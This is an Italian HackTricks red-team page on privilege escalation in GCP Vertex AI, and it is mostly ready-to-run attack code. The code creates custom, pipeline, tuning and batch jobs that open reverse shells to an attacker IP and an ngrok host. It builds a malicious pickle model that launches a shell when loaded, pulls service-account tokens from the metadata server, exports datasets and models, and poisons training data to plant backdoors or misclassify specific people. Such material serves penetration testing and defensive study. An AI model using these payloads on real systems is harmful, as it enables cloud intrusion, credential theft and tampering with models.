GCP - Vertex AI Privesc

Tip

Impara & pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sostieni HackTricks

Vertex AI

Per maggiori informazioni su Vertex AI consulta:

GCP - Vertex AI Enum

Per i percorsi di post-exploitation di Agent Engine / Reasoning Engine che utilizzano il runtime metadata service, l’agente di servizio Vertex AI predefinito e il cross-project pivoting verso risorse consumer / producer / tenant, consulta:

GCP - Vertex AI Post Exploitation

aiplatform.customJobs.create, iam.serviceAccounts.actAs

Con il permesso aiplatform.customJobs.create e iam.serviceAccounts.actAs su un service account target, un attaccante può eseguire codice arbitrario con privilegi elevati.

Questo avviene creando un custom training job che esegue codice controllato dall’attaccante (sia un custom container sia un Python package). Specificando un service account privilegiato tramite il flag --service-account, il job eredita i permessi di quel service account. Il job gira su infrastruttura gestita da Google con accesso al GCP metadata service, permettendo l’estrazione del token di accesso OAuth dell’account di servizio.

Impatto: Escalation completa dei privilegi ai permessi del service account target.

Creare un custom job con reverse shell ```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region= \ --display-name=revshell-job \ --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \ --command=sh \ --args=-c,"curl http://attacker.com" \ --service-account=@.iam.gserviceaccount.com

On your attacker machine, start a listener first:

nc -lvnp 4444

Once connected, you can extract the token with:

curl -H ‘Metadata-Flavor: Google’ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Method 2: Python reverse shell (if bash reverse shell is blocked)

gcloud ai custom-jobs create
–region=
–display-name=revshell-job
–worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
–command=sh
–args=-c,“python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”
–service-account=@.iam.gserviceaccount.com

</details>

<details>

<summary>Alternativa: Estrai token dai logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>

aiplatform.models.upload, aiplatform.models.get

Questa tecnica ottiene l’escalation dei privilegi caricando un modello su Vertex AI e poi sfruttando quel modello per eseguire codice con privilegi elevati tramite il deployment di un endpoint o un batch prediction job.

Note

Per eseguire questo attacco è necessario avere un bucket GCS leggibile da tutti o crearne uno nuovo per caricare gli artifacts del modello.

Upload malicious pickled model with reverse shell ```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickle

class MaliciousModel: def reduce(self): import subprocess cmd = “bash -i >& /dev/tcp/YOUR-IP/4444 0>&1” return (subprocess.Popen, ([‘/bin/bash’, ‘-c’, cmd],))

Save malicious model

with open(‘model.pkl’, ‘wb’) as f: pickle.dump(MaliciousModel(), f) EOF

python3 create_malicious_model.py

Upload to GCS

gsutil cp model.pkl gs://your-bucket/malicious-model/

Upload model (reverse shell executes when endpoint loads it during deployment)

gcloud ai models upload
–region=
–artifact-uri=gs://your-bucket/malicious-model/
–display-name=malicious-sklearn
–container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

On attacker: nc -lvnp 4444 (shell connects when deployment starts)

</details>

<details>

<summary>Caricare modello con container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

[!DANGER] Dopo aver caricato il modello malevolo, un attaccante potrebbe aspettare che qualcuno utilizzi il modello, oppure avviare il modello lui stesso tramite un deployment su endpoint o mediante un job di batch prediction.

iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) o ( aiplatform.endpoints.setIamPolicy )

Se hai i permessi per creare e distribuire modelli su endpoint, o per modificare le policy IAM degli endpoint, puoi sfruttare modelli malevoli caricati nel progetto per ottenere privilege escalation. Per innescare uno dei modelli malevoli precedentemente caricati tramite un endpoint, tutto ciò che devi fare è:

Distribuire il modello malevolo su un endpoint ```bash # Create an endpoint gcloud ai endpoints create \ --region= \ --display-name=revshell-endpoint

Deploy with privileged service account

gcloud ai endpoints deploy-model
–region=
–model=
–display-name=revshell-deployment
–service-account=@.iam.gserviceaccount.com
–machine-type=n1-standard-2
–min-replica-count=1

</details>


#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

Se hai i permessi per creare dei **batch prediction jobs** e eseguirli con un service account puoi accedere al metadata service. Il codice maligno viene eseguito da un **custom prediction container** o da un **malicious model** durante il processo di batch prediction.

**Nota**: I Batch prediction jobs possono essere creati solo tramite REST API o Python SDK (nessun supporto via gcloud CLI).

> [!NOTE]
> Questo attacco richiede prima l'upload di un malicious model (vedi la sezione `aiplatform.models.upload` sopra) oppure l'uso di un custom prediction container con il tuo reverse shell code.

<details>

<summary>Crea batch prediction job con malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.models.export

Se hai il permesso models.export, puoi esportare gli artefatti del modello in un GCS bucket che controlli, potenzialmente accedendo a dati di addestramento sensibili o file del modello.

Note

Per eseguire questo attacco è necessario disporre di un GCS bucket leggibile e scrivibile da chiunque o crearne uno nuovo per caricare gli artefatti del modello.

Esportare gli artefatti del modello in un GCS bucket ```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export”
-d ‘{ “outputConfig”: { “exportFormatId”: “custom-trained”, “artifactDestination”: { “outputUriPrefix”: “gs://your-controlled-bucket/exported-models/” } } }’

Wait for the export operation to complete, then download

gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Crea **ML pipeline jobs** che eseguono piĂš passaggi con container arbitrari e ottengono escalation di privilegi tramite accesso reverse shell.

Le pipeline sono particolarmente potenti per l'escalation dei privilegi perchÊ supportano attacchi multi-stage in cui ogni componente può usare container e configurazioni diverse.

> [!NOTE]
> È necessario un bucket GCS scrivibile da chiunque da usare come radice della pipeline.

<details>

<summary>Installa Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Crea un job di pipeline con container reverse shell ```python #!/usr/bin/env python3 import json import subprocess

PROJECT_ID = “” REGION = “us-central1” TARGET_SA = “”

Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)

pipeline_spec = { “schemaVersion”: “2.1.0”, “sdkVersion”: “kfp-2.0.0”, “pipelineInfo”: { “name”: “data-processing-pipeline” }, “root”: { “dag”: { “tasks”: { “process-task”: { “taskInfo”: { “name”: “process-task” }, “componentRef”: { “name”: “comp-process” } } } } }, “components”: { “comp-process”: { “executorLabel”: “exec-process” } }, “deploymentSpec”: { “executors”: { “exec-process”: { “container”: { “image”: “python:3.11-slim”, “command”: [“python3”], “args”: [“-c”, “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘4.tcp.eu.ngrok.io’,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([‘/bin/bash’,‘-i’])”] } } } } }

Create the request body

request_body = { “displayName”: “ml-training-pipeline”, “runtimeConfig”: { “gcsOutputDirectory”: “gs://gstorage-name/folder” }, “pipelineSpec”: pipeline_spec, “serviceAccount”: TARGET_SA }

Get access token

token_result = subprocess.run( [“gcloud”, “auth”, “print-access-token”], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()

Submit via REST API

import requests

url = f“https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs“ headers = { “Authorization”: f“Bearer {access_token}“, “Content-Type”: “application/json” }

print(f“Submitting pipeline job to {url}“) response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]: result = response.json() print(f“✓ Pipeline job submitted successfully!“) print(f” Job name: {result.get(‘name’, ‘N/A’)}“) print(f” Check your reverse shell listener for connection“) else: print(f“✗ Error: {response.status_code}“) print(f” {response.text}“)

### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Crea **hyperparameter tuning jobs** che eseguono codice arbitrario con privilegi elevati attraverso custom training containers.

I hyperparameter tuning jobs consentono di eseguire piĂš training trials in parallelo, ciascuno con diversi valori di iperparametri. Specificando un container malevolo con una reverse shell o un comando di exfiltration, e associandolo a un privileged service account, puoi ottenere privilege escalation.

**Impact**: Full privilege escalation alle permissions del service account target.

<details>

<summary>Crea hyperparameter tuning job con reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.datasets.export

Esporta i dataset per esfiltrare i dati di addestramento che possono contenere informazioni sensibili.

Nota: Le operazioni sui dataset richiedono REST API o Python SDK (nessun supporto gcloud CLI per i dataset).

I dataset spesso contengono i dati di addestramento originali che possono includere PII, dati aziendali riservati o altre informazioni sensibili utilizzate per addestrare i modelli in produzione.

Esporta il dataset per esfiltrare i dati di addestramento ```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"

curl -s -X GET
-H “Authorization: Bearer $(gcloud auth print-access-token)”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets”

Step 2: Export a dataset to your own bucket using REST API

DATASET_ID=“”

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export”
-d ‘{ “exportConfig”: { “gcsDestination”: {“outputUriPrefix”: “gs://your-controlled-bucket/exported-data/”} } }’

The export operation runs asynchronously and will return an operation ID

Wait a few seconds for the export to complete

Step 3: Download the exported data

gsutil ls -r gs://your-controlled-bucket/exported-data/

Download all exported files

gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

Step 4: View the exported data

The data will be in JSONL format with references to training data locations

cat exported-data//data-.jsonl

The exported data may contain:

- References to training images/files in GCS buckets

- Dataset annotations and labels

- PII (Personally Identifiable Information)

- Sensitive business data

- Internal documents or communications

- Credentials or API keys in text data

</details>


### `aiplatform.datasets.import`

Importa dati malevoli o avvelenati in dataset esistenti per **manipolare l'addestramento dei modelli e introdurre backdoors**.

**Nota**: Le operazioni sui dataset richiedono REST API o Python SDK (nessun supporto via gcloud CLI per i dataset).

Importando dati manipolati in un dataset usato per addestrare modelli ML, un attaccante può:
- Introdurre backdoors nei modelli (misclassificazione basata su trigger)
- Avvelenare i dati di addestramento per degradare le prestazioni del modello
- Iniettare dati per far sĂŹ che i modelli leak informazioni
- Manipolare il comportamento del modello per input specifici

Questo attacco è particolarmente efficace quando si prendono di mira dataset usati per:
- Classificazione di immagini (iniettare immagini etichettate in modo errato)
- Classificazione di testo (iniettare testo fazioso o malevolo)
- Rilevamento oggetti (manipolare le bounding boxes)
- Sistemi di raccomandazione (iniettare preferenze false)

<details>

<summary>Importare dati avvelenati nel dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

Attack Scenarios:

Backdoor attack - Classificazione delle immagini ```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```
Label flipping attack ```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```
Avvelenamento dei dati per l'estrazione del modello ```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```
Attacco mirato a entitĂ  specifiche ```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```

[!DANGER] Gli attacchi di data poisoning possono avere conseguenze gravi:

  • Sistemi di sicurezza: eludere il riconoscimento facciale o il rilevamento di anomalie
  • Rilevamento frodi: addestrare modelli a ignorare specifici schemi di frode
  • Moderazione dei contenuti: far classificare contenuti dannosi come sicuri
  • AI medica: classificare in modo errato condizioni sanitarie critiche
  • Sistemi autonomi: manipolare il rilevamento degli oggetti per decisioni critiche per la sicurezza

Impatto:

  • Modelli backdoored che classificano in modo errato su trigger specifici
  • Prestazioni e accuratezza del modello degradate
  • Modelli distorti che discriminano determinati input
  • Information leak attraverso il comportamento del modello
  • Persistenza a lungo termine (i modelli addestrati su dati avvelenati erediteranno il backdoor)

aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs

Warning

Note

API deprecata: L’API aiplatform.notebookExecutionJobs.create è deprecata come parte della deprecazione di Vertex AI Workbench Managed Notebooks. L’approccio moderno è utilizzare Vertex AI Workbench Executor che esegue i notebook tramite aiplatform.customJobs.create (già documentato sopra). Il Vertex AI Workbench Executor permette di programmare esecuzioni di notebook che vengono eseguite sull’infrastruttura di training custom di Vertex AI con un account di servizio specificato. Questo è essenzialmente un wrapper di comodità attorno a customJobs.create. For privilege escalation via notebooks: Usa il metodo aiplatform.customJobs.create documentato sopra, che è più veloce, più affidabile e utilizza la stessa infrastruttura sottostante del Workbench Executor.

La tecnica seguente è fornita solo per contesto storico ed non è raccomandata per l’uso in nuove valutazioni.

Crea job di esecuzione di notebook che eseguono Jupyter notebooks con codice arbitrario.

I job notebook sono ideali per l’esecuzione di codice in stile interattivo con un account di servizio, poiché supportano celle di codice Python e comandi shell.

Crea un file notebook maligno ```bash # Create a malicious notebook cat > malicious.ipynb <<'EOF' { "cells": [ { "cell_type": "code", "source": [ "import subprocess\n", "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n", "print(token.decode())" ] } ], "metadata": {}, "nbformat": 4 } EOF

Upload to GCS

gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb

</details>

<details>

<summary>Eseguire il notebook con l'account di servizio di destinazione</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"


curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions

Riferimenti

Tip

Impara & pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sostieni HackTricks